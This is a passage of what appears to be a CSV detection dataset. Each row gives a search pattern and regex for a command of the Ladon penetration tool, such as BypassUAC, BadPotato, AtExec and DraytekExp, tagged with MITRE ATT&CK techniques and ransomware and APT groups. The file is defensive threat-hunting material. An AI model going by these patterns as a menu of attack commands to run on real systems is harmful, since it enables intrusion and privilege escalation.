LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50704"
"*Ladon ActiveAdmin*",".{0,1000}Ladon\sActiveAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50705"
"*Ladon ActiveGuest*",".{0,1000}Ladon\sActiveGuest.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50706"
"*Ladon AdiDnsDump *",".{0,1000}Ladon\sAdiDnsDump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50707"
"*Ladon at c:*",".{0,1000}Ladon\sat\sc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50708"
"*Ladon AtExec*",".{0,1000}Ladon\sAtExec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50709"
"*Ladon AutoRun*",".{0,1000}Ladon\sAutoRun.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50710"
"*Ladon BadPotato*",".{0,1000}Ladon\sBadPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50711"
"*Ladon BypassUAC*",".{0,1000}Ladon\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50712"
"*Ladon CheckDoor*",".{0,1000}Ladon\sCheckDoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50713"
"*Ladon Clslog*",".{0,1000}Ladon\sClslog.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50714"
"*Ladon CmdDll *",".{0,1000}Ladon\sCmdDll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50715"
"*Ladon cmdline*",".{0,1000}Ladon\scmdline.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50716"
"*Ladon CVE-*",".{0,1000}Ladon\sCVE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50717"
"*Ladon DirList*",".{0,1000}Ladon\sDirList.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50718"
"*Ladon DraytekExp*",".{0,1000}Ladon\sDraytekExp.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 